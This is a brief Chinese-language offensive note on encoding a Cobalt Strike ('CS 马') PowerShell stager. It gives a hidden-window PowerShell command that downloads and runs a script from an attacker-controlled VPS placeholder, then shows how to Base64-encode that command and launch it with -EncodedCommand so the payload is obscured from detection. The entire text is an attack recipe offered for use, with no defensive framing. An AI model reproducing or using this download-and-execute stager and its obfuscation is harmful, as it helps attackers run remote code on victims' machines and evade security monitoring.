CS 马编码
Powershell CS 马编码
处理前
没有经过任何处理的 PowerShell CS 马
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://VPS的IP:端口/ps'))"
处理后
在 PowerShell 命令行中输入以下命令
$command= "IEX ((new-object net.webclient).downloadstring('http://VPS的IP:端口/ps'))"
$bytes = [Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
echo $encodedCommand
最后组装编码后的 Payload
powershell.exe -EncodedCommand 经过编码后的内容